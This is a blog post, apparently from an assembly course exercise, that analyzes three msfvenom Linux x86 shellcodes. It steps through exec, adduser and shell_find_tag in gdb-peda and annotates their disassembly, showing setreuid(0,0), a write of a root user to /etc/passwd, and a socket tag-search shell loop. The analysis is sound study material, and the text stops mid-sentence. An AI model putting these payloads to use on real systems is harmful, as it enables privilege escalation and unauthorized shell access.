{"id":120,"date":"2020-08-28T11:00:00","date_gmt":"2020-08-28T11:00:00","guid":{"rendered":"https:\/\/badbit.vc\/?p=120"},"modified":"2020-09-02T20:56:27","modified_gmt":"2020-09-02T20:56:27","slug":"analyzing-shellcodes","status":"publish","type":"post","link":"https:\/\/badbit.vc\/index.php\/2020\/08\/28\/analyzing-shellcodes\/","title":{"rendered":"Analyzing Shellcodes"},"content":{"rendered":"\n<p>In this blog post, we will analyze shellcodes created from <em>msfvenom<\/em>. We will focus on Linux &#8211; x86 as the target OS and architecture.<br>Let&#8217;s begin by listing all the available shellcodes for Linux x86 architecture.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"667\" src=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Listing-shellcodes-1024x667.jpg\" alt=\"\" class=\"wp-image-123\" srcset=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Listing-shellcodes-1024x667.jpg 1024w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Listing-shellcodes-300x196.jpg 300w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Listing-shellcodes-768x501.jpg 768w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Listing-shellcodes-850x554.jpg 850w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Listing-shellcodes.jpg 1281w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\"><strong>Shellcodes to be analyzed:<\/strong><\/h4>\n\n\n\n<figure class=\"wp-block-table aligncenter is-style-stripes\"><table><tbody><tr><td><strong>#<\/strong><\/td><td><strong>Name<\/strong><\/td><td><strong>Description<\/strong><\/td><\/tr><tr><td>1<\/td><td>Linux\/x86\/exec<\/td><td>Execute an arbitrary command<\/td><\/tr><tr><td>2<\/td><td>linux\/x86\/adduser<\/td><td>Create a new user with UID 0<\/td><\/tr><tr><td>3<\/td><td>linux\/x86\/shell_find_tag<\/td><td>Spawn a shell on an established connection (Proxy\/nat safe)<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\"><strong>Tools used:<\/strong><\/h4>\n\n\n\n<ul class=\"wp-block-list\"><li>GDB-peda<\/li><li>ndisasm<\/li><\/ul>\n\n\n\n<hr class=\"wp-block-separator\"\/>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>1. linux\/x86\/exec<\/strong><\/h3>\n\n\n\n<p>Let us generate our payload to examine it.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"749\" height=\"191\" src=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/exec_pwd_paylaod.jpg\" alt=\"\" class=\"wp-image-127\" srcset=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/exec_pwd_paylaod.jpg 749w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/exec_pwd_paylaod-300x77.jpg 300w\" sizes=\"auto, (max-width: 749px) 100vw, 749px\" \/><\/figure>\n\n\n\n<p>Here, I have used the &#8220;pwd&#8221; command as an argument to the payload. Hence, when the payload will be executed, the &#8220;pwd&#8221; command will be executed on the victim&#8217;s machine. Below is the output:<br><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"78\" src=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/payload_output.jpg\" alt=\"\" class=\"wp-image-128\" srcset=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/payload_output.jpg 768w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/payload_output-300x30.jpg 300w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<p>Running strings on the generated payload shows us that &#8220;\/bin\/sh&#8221; is being used in the payload somewhere.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"894\" height=\"353\" src=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/file_strings.jpg\" alt=\"\" class=\"wp-image-129\" srcset=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/file_strings.jpg 894w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/file_strings-300x118.jpg 300w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/file_strings-768x303.jpg 768w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/file_strings-850x336.jpg 850w\" sizes=\"auto, (max-width: 894px) 100vw, 894px\" \/><\/figure>\n\n\n\n<p>Now let&#8217;s get into the real thing and start analyzing the actual shellcode we generated as seen in Fig. 1.<br>We will pass the generated raw bytes to a c harness and compile the file for analysis.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"266\" src=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/c_harness-1024x266.jpg\" alt=\"\" class=\"wp-image-130\" srcset=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/c_harness-1024x266.jpg 1024w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/c_harness-300x78.jpg 300w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/c_harness-768x199.jpg 768w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/c_harness-1536x399.jpg 1536w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/c_harness-850x221.jpg 850w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/c_harness.jpg 1773w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>And compile it using: \ngcc -z execstack -fno-stack-protector payload.c -o payload<\/code><\/pre>\n\n\n\n<p>Let&#8217;s load the generated &#8220;payload&#8221; file in gdb and trace through the instructions.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"997\" height=\"641\" src=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda1.jpg\" alt=\"\" class=\"wp-image-132\" srcset=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda1.jpg 997w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda1-300x193.jpg 300w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda1-768x494.jpg 768w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda1-850x546.jpg 850w\" sizes=\"auto, (max-width: 997px) 100vw, 997px\" \/><\/figure>\n\n\n\n<p>After hitting our breakpoint at &#8220;buf&#8221; as seen above, we will disassemble the program by using the <em>disass <\/em>command in gdb and analyse the instructions. The analysis is shown in the below section wherein a comment has been mentioned describing each instruction being executed.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>push   0xb                        ; Pushing \"11\" as hex on the stack\npop    eax                        ; Popping the top of the stack (11) inside EAX\ncdq    \npush   edx                        ; Pushing EDX (Null) on the stack which is empty\npushw  0x632d                     ; Pushing \"c-\" on the stack (Little Endian)\nmov    edi,esp                    ; Moving stack pointer in EDI. (-c) \npush   0x68732f                   ; Pushing \"hs\/\" on the stack. (\/sh)\npush   0x6e69622f                 ; Pushing \"nib\/\" on the stack. (\/bin). Now the stack contains (\/bin\/sh)\nmov    ebx,esp                    ; Moving stack pointer in EBX\npush   edx                        ; Pushing EDX (Null) on the stack which is empty\ncall   0x804a061 &lt;buf+33>          \njo     0x804a0d6                  \nadd    BYTE PTR fs:&#91;edi+0x53],dl  \nmov    ecx,esp                    \nint    0x80                       \nadd    BYTE PTR &#91;eax],al          <\/code><\/pre>\n\n\n\n<p>As observed, an execve syscall is being made as EBX contains the value 11. <br>The registers hold the following contents as of now:<\/p>\n\n\n\n<p class=\"has-text-align-left\"><span class=\"has-inline-color has-light-green-cyan-color\"><strong>EAX <\/strong><\/span><strong><span class=\"has-inline-color has-very-dark-gray-color\">=<\/span><\/strong><span class=\"has-inline-color has-light-green-cyan-color\"><strong> <\/strong><\/span><strong><span class=\"has-inline-color has-very-dark-gray-color\">11<\/span><\/strong><span class=\"has-inline-color has-light-green-cyan-color\"><br><strong>EBX <\/strong><\/span><strong><span class=\"has-inline-color has-very-dark-gray-color\">=<\/span><\/strong><span class=\"has-inline-color has-light-green-cyan-color\"><strong> <\/strong><\/span><span class=\"has-inline-color has-very-dark-gray-color\"><strong>Pointer to &#8220;\/bin\/sh<\/strong>&#8220;<\/span><span class=\"has-inline-color has-light-green-cyan-color\"><br><strong>EDI <\/strong><\/span><strong><span class=\"has-inline-color has-very-dark-gray-color\">=<\/span><\/strong><span class=\"has-inline-color has-light-green-cyan-color\"><strong> <\/strong><\/span><span class=\"has-inline-color has-very-dark-gray-color\"><strong>Pointer to &#8220;-c<\/strong>&#8220;<\/span><br><strong><span class=\"has-inline-color has-light-green-cyan-color\">ESP<\/span> = NULL<\/strong><\/p>\n\n\n\n<p>As per execve&#8217;s man reference, the synopsis is described as &#8211;<br><em>int execve(const char *filename, char *const argv[], char *constenvp[]);<\/em><br><br>As of now, EAX holds the expected value. EBX must contain the name of the binary which as of now is pointing to \/bin\/sh which is also correct. ECX must contain the arguments to the binary terminated by a NULL character and by convention the first string has to be the name of the binary to be executed (\/bin\/sh) and EDX must contain the environment variables which in our case can be NULL.<\/p>\n\n\n\n<p>So as per our analysis so far, we have satisfied EAX (Syscall number) and EBX (Binary to execute &#8211; \/bin\/sh). We are yet to fully pass the arguments in ECX register which in our case should be <strong>&#8220;-c pwd&#8221;<\/strong>. However, we have already stored -c in EDI. Now let&#8217;s place a breakpoint at the next call instruction and furhter analyse from there.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"944\" height=\"551\" src=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda2.jpg\" alt=\"\" class=\"wp-image-135\" srcset=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda2.jpg 944w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda2-300x175.jpg 300w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda2-768x448.jpg 768w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda2-850x496.jpg 850w\" sizes=\"auto, (max-width: 944px) 100vw, 944px\" \/><\/figure>\n\n\n\n<p>Once we break at 0x804a058 (call to address 0x804a061) and step by one, the address to the next instruction gets populated on the stack, which is 0x804a05d. If we analyze the address on the stack by character bytes, we notice the address points to the bytes 0x70, 0x77 and 0x64 which if converted to ASCII leads to &#8211; <strong>pwd.<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"743\" height=\"161\" src=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda3.jpg\" alt=\"\" class=\"wp-image-136\" srcset=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda3.jpg 743w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda3-300x65.jpg 300w\" sizes=\"auto, (max-width: 743px) 100vw, 743px\" \/><\/figure>\n\n\n\n<p>So now the stack (ESP) contains an address which points to <strong>pwd.<\/strong> Let&#8217;s reiterate over our contents of our registers before moving forward:<\/p>\n\n\n\n<p><strong><span class=\"has-inline-color has-light-green-cyan-color\">EAX<\/span> = 0xb (11)<br><span class=\"has-inline-color has-light-green-cyan-color\">EBX<\/span> = Pointer to &#8220;\/bin\/sh&#8221;<br><span class=\"has-inline-color has-light-green-cyan-color\">EDI<\/span> = Pointer to &#8220;-c&#8221;<br><span class=\"has-inline-color has-light-green-cyan-color\">ESP<\/span> = Pointer to &#8220;pwd&#8221;, Pointer to NULL<\/strong><\/p>\n\n\n\n<p>Now let&#8217;s analyse the call to 0x804a061.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"920\" height=\"305\" src=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda4.jpg\" alt=\"\" class=\"wp-image-137\" srcset=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda4.jpg 920w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda4-300x99.jpg 300w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda4-768x255.jpg 768w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda4-850x282.jpg 850w\" sizes=\"auto, (max-width: 920px) 100vw, 920px\" \/><\/figure>\n\n\n\n<p>As we can see, the address points to <strong>0xe1895357. <\/strong>Let&#8217;s try to analyse the  address as instruction.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"414\" height=\"71\" src=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda5.jpg\" alt=\"\" class=\"wp-image-138\" srcset=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda5.jpg 414w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda5-300x51.jpg 300w\" sizes=\"auto, (max-width: 414px) 100vw, 414px\" \/><\/figure>\n\n\n\n<p>As expected, the instruction is &#8211; <strong>push EDI<\/strong>, which is nothing but a push <strong>&#8220;-c&#8221;<\/strong> as EDI contains a pointer to &#8220;-c&#8221;.<br>Now, <strong>from top to bottom the contents of the stack are &#8211; &#8220;-c pwd NULL&#8221;<\/strong><\/p>\n\n\n\n<p>Moving further, stepping by one, the next instruction pointed by address 0x804a062 contains a <strong>PUSH EBX<\/strong> as seen below. <\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1006\" height=\"419\" src=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda6.jpg\" alt=\"\" class=\"wp-image-141\" srcset=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda6.jpg 1006w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda6-300x125.jpg 300w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda6-768x320.jpg 768w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda6-850x354.jpg 850w\" sizes=\"auto, (max-width: 1006px) 100vw, 1006px\" \/><\/figure>\n\n\n\n<p>As we already know, EBX contains a pointer to &#8220;\/bin\/sh&#8221; which now simply gets pushed on top of the stack. Now if you see, the contents of the stack look something like this:<\/p>\n\n\n\n<figure class=\"wp-block-table aligncenter\"><table><tbody><tr><td>\/bin\/sh\/<\/td><\/tr><tr><td>    -c<\/td><\/tr><tr><td>   pwd<\/td><\/tr><tr><td> NULL<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>And the next instruction at 0x804a063 as seen in the above screenshot is simply moving the stack pointer into ECX.<br>Now if we take a look at the contents of the registers, we get:<\/p>\n\n\n\n<p><strong><span class=\"has-inline-color has-light-green-cyan-color\">EAX<\/span> = 11<\/strong><br><strong><span class=\"has-inline-color has-light-green-cyan-color\">EBX <\/span>= Pointer to &#8220;\/bin\/sh<\/strong>&#8220;<br><strong><span class=\"has-inline-color has-light-green-cyan-color\">ECX<\/span> = Pointer to &#8220;\/bin\/sh&#8221;, &#8220;-c&#8221;, &#8220;pwd&#8221;, NULL<\/strong><br><strong><span class=\"has-inline-color has-light-green-cyan-color\">EDX<\/span> = 0x0<\/strong> (Never utilised)<br><br>The above registers satisfy the requirements of execve syscall  requirements as seen in the man reference. The next instruction as seen in the above screenshot is an interrupt 80 which executes the syscall and our payload gets executed.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1018\" height=\"123\" src=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda7.jpg\" alt=\"\" class=\"wp-image-142\" srcset=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda7.jpg 1018w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda7-300x36.jpg 300w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda7-768x93.jpg 768w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda7-850x103.jpg 850w\" sizes=\"auto, (max-width: 1018px) 100vw, 1018px\" \/><\/figure>\n\n\n\n<hr class=\"wp-block-separator\"\/>\n\n\n<p>That&#8217;s all for the first shellcode, the remaining two shellcodes will be discussed in the next part.<br>Links:<br><!--?php next_posts_link( $label , $max_pages ); ?--><a href=\"https:\/\/badbit.vc\/index.php\/2020\/08\/28\/analyzing-shellcodes\/2\/\">Part 2 &#8211; linux\/x86\/adduser<\/a><br><a href=\"https:\/\/badbit.vc\/index.php\/2020\/08\/28\/analyzing-shellcodes\/3\/\">Part 3 &#8211; linux\/x86\/shell_find_tag<\/a><\/p>\n\n\n<!--nextpage-->\n\n\n\n<h3 class=\"wp-block-heading\"><strong>2. linux\/x86\/adduser<\/strong><\/h3>\n\n\n\n<p>In this post, we will analyze linux\/x86\/adduser payload. Following the same process as in the previous analysis, we will generate our payload with msfvenom and put it in a C harness and disassemble the code to analyze it.<br>Hitting our breakpoint at *&amp;buf and disassembling, we can observe that multiple interrupt calls are made.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"998\" height=\"897\" src=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda1-1.jpg\" alt=\"\" class=\"wp-image-154\" srcset=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda1-1.jpg 998w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda1-1-300x270.jpg 300w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda1-1-768x690.jpg 768w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda1-1-850x764.jpg 850w\" sizes=\"auto, (max-width: 998px) 100vw, 998px\" \/><\/figure>\n\n\n\n<p>Let&#8217;s analyze them to gain a better understanding.<br>The very first syscall seems to be syscall #70 which as per the unistd_32.h file is &#8220;setreuid&#8221; syscall as seen below.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"893\" height=\"852\" src=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda2-1.jpg\" alt=\"\" class=\"wp-image-155\" srcset=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda2-1.jpg 893w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda2-1-300x286.jpg 300w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda2-1-768x733.jpg 768w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda2-1-850x811.jpg 850w\" sizes=\"auto, (max-width: 893px) 100vw, 893px\" \/><\/figure>\n\n\n\n<p>A description of each instruction is given as comment below:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>xor    ecx, ecx ; Clearing out ECX register. ECX = 0x0\nmov    ebx,ecx\t; Moving 0x0 in EBX register. EBX = 0x0\npush   0x46\t\t; Pushing 0x46 on the stack\npop    eax\t\t; EAX now contains 0x46 which is a syscall to \"Setreuid\"\nint    0x80\t\t; Interrupt signal. sereuid(0, 0)\npush   0x5\t\t; Pushing 0x5 on the stack\npop    eax\t\t; Moving 0x5 on in EAX register. EAX = 0x5 which is a syscall to \"open\".\nxor    ecx,ecx\t; Clearing out ECX register. ECX = 0x0\npush   ecx\t\t; Pushing 0x0 on the stack\npush   0x64777373\t; Pushing \"sswd\" in reverse order on the stack\npush   0x61702f2f\t; Pushing \"\/\/pa\" in reverse order on the stack\npush   0x6374652f\t; Pushing \"\/etc\" in reverse order on the stack\nmov    ebx,esp\t; Moving stack pointer in EBX which is pointing\n                ; to \"\/etc\/\/passwd\" terminated with a null pointer\ninc    ecx\t\t; Incrementing ECX. ECX = 0x1 (O_WRONLY flag)\nmov    ch,0x4\t; Moving 0x4 in CH. ECX = 0x401\nint    0x80\t; Interrupt signal. open(\"\/etc\/\/passwd\", 0x401, 0)\nxchg   ebx,eax\t; Putting the return value in ebx which is a file descriptor\n                ; to \"\/etc\/passwd\"\ncall   0x804a093 &lt;buf+83> ; The call function loads the address of our user, \n                          ; password and the shell to use in the stack\n<\/code><\/pre>\n\n\n\n<p>Once the call instruction is placed, the control goes to the address 0x804a093 as seen above. Let&#8217;s analyse what&#8217;s in store for us there.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"514\" src=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda3-1-1024x514.jpg\" alt=\"\" class=\"wp-image-156\" srcset=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda3-1-1024x514.jpg 1024w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda3-1-300x151.jpg 300w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda3-1-768x386.jpg 768w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda3-1-850x427.jpg 850w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda3-1.jpg 1065w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>As we can see, the stack pointer is pointing to the user details string and the same is being popped into ECX in the next instruction. Also, we can notice that 0x4 is being pushed and popped back in EAX register which is a &#8220;write&#8221; syscall. Therefore, it is safe to assume that EDX register will contain the size of what&#8217;s being put in ECX register. Lastly, interrupt is made thus executing:<br><em><strong>write(fd to &#8220;\/etc\/\/passwd&#8221;, user string, bytes)<\/strong><\/em>.<br>Lastly, the code exits gracefully by calling the &#8220;exit&#8221; syscall as seen below.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"890\" height=\"170\" src=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda4-1.jpg\" alt=\"\" class=\"wp-image-157\" srcset=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda4-1.jpg 890w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda4-1-300x57.jpg 300w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda4-1-768x147.jpg 768w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda4-1-850x162.jpg 850w\" sizes=\"auto, (max-width: 890px) 100vw, 890px\" \/><\/figure>\n\n\n\n<p>Below are the results of our shellcode:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"79\" src=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda5-1-1024x79.jpg\" alt=\"\" class=\"wp-image-159\" srcset=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda5-1-1024x79.jpg 1024w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda5-1-300x23.jpg 300w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda5-1-768x59.jpg 768w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda5-1-850x65.jpg 850w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda5-1.jpg 1065w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<hr class=\"wp-block-separator\"\/>\n\n\n\n<p>That&#8217;s all foolks! Here&#8217;s a link to the third and the last part of the series:<br><a href=\"https:\/\/badbit.vc\/index.php\/2020\/08\/28\/analyzing-shellcodes\/3\/\">Part 3 &#8211; linux\/x86\/shell_find_tag<\/a><\/p>\n\n\n\n<!--nextpage-->\n\n\n\n<h3 class=\"wp-block-heading\"><strong>3. linux\/x86\/shell_find_tag<\/strong><\/h3>\n\n\n\n<p>As per the shellcode&#8217;s description, the payload spawns a shell on an established connection. Let&#8217;s take a look at the options.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"512\" src=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Screenshot_20200819_041954-1024x512.jpg\" alt=\"\" class=\"wp-image-161\" srcset=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Screenshot_20200819_041954-1024x512.jpg 1024w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Screenshot_20200819_041954-300x150.jpg 300w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Screenshot_20200819_041954-768x384.jpg 768w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Screenshot_20200819_041954-850x425.jpg 850w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Screenshot_20200819_041954.jpg 1163w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>The two mandatory options are TAG and MeterpreterDebugLevel. Since we aren&#8217;t dealing with a meterpreter shell in here, we can leave it to its default state. For the option tag, let&#8217;s state it to SLAE and generate our payload and take a quick high level look by running it through ndisasm.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"901\" height=\"691\" src=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Screenshot_20200819_045011.jpg\" alt=\"\" class=\"wp-image-162\" srcset=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Screenshot_20200819_045011.jpg 901w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Screenshot_20200819_045011-300x230.jpg 300w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Screenshot_20200819_045011-768x589.jpg 768w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Screenshot_20200819_045011-850x652.jpg 850w\" sizes=\"auto, (max-width: 901px) 100vw, 901px\" \/><\/figure>\n\n\n\n<p>Alright, we can see three interrupts happening at 16, 29 and 43 and the values in EAX at the time of interrupt calls are 102, 63 and 11 which refer to <strong>socketcall, dup2 <\/strong>and<strong> execve<\/strong> respectively. If we recollect, this pattern is similar to what we have observed while spawning a shell. The only logic we need to understand is the &#8220;tag search&#8221; logic. Let&#8217;s dive into the shellcode with gdb-peda.<\/p>\n\n\n\n<p>We will use a C harness and generate an executable to perform our analysis just like what we did for previous two cases. Below I have loaded the executable in gdb-peda and set up a breakpoint at the beginning of  the actual shellcode. What we observe are the following instructions:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>xor    ebx,ebx\t; Clearing out the ebx register\npush   ebx\t; Pushing EBX on the stack\nmov    esi,esp\t; Moving stack pointer which is pointing to 0x0\npush   0x40\t; Pushing 0x40 on the stack\nmov    bh,0xa\t; Pushing 0xa in the higher byte of EBX. EBX = 0xa00\npush   ebx\t; Pushing EBX on the stack (0xa00)\npush   esi\t; Pushing ESI on the stack (0x0)\npush   ebx\t; Pushing EBX on the stack (0xa00)\nmov    ecx,esp\t; Moving stack pointer in ECX\nxchg   bl,bh\t; Exchanging bh with bl. EBX = 0xa<\/code><\/pre>\n\n\n\n<p>From the looks of it, it appears to be a stack setup for arguments to a certain syscall. Moving further, I have used the <em>stepuntil<\/em> command to step until the first interrupt call.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"882\" height=\"831\" src=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda1-2.jpg\" alt=\"\" class=\"wp-image-166\" srcset=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda1-2.jpg 882w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda1-2-300x283.jpg 300w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda1-2-768x724.jpg 768w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda1-2-850x801.jpg 850w\" sizes=\"auto, (max-width: 882px) 100vw, 882px\" \/><figcaption>Fig (1)<\/figcaption><\/figure>\n\n\n\n<p>Alright, so as we can see, the stack is loaded with the arguments to a socketcall which in this case is <strong><em>recv<\/em><\/strong> as EBX currently contains 0xa (10).<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"882\" height=\"563\" src=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda2-2.jpg\" alt=\"\" class=\"wp-image-167\" srcset=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda2-2.jpg 882w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda2-2-300x191.jpg 300w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda2-2-768x490.jpg 768w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda2-2-850x543.jpg 850w\" sizes=\"auto, (max-width: 882px) 100vw, 882px\" \/><\/figure>\n\n\n\n<p>And naturally, as per the <strong>socketcall <\/strong>syscall convention, ECX must point to the arguments of the actual call that is to be invoked (recv in this case) which we can see in the address pointed by ECX.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>recv syscall - ssize_t recv(int sockfd, void *buf, size_t len, int flags);\npayload equivalent - recv(0xa01, *0xbff23c, 0xa00, 0x40)<\/code><\/pre>\n\n\n\n<p>Moving further in the disassembly, we can observe that a compare operation is performed which checks &#8220;SLAE&#8221; (reversed little-endian format) against the bytes pointed by ESI and if not found increments the sockfd byte (0xa01) by one and again calls the syscall. This would run in a loop until the tag 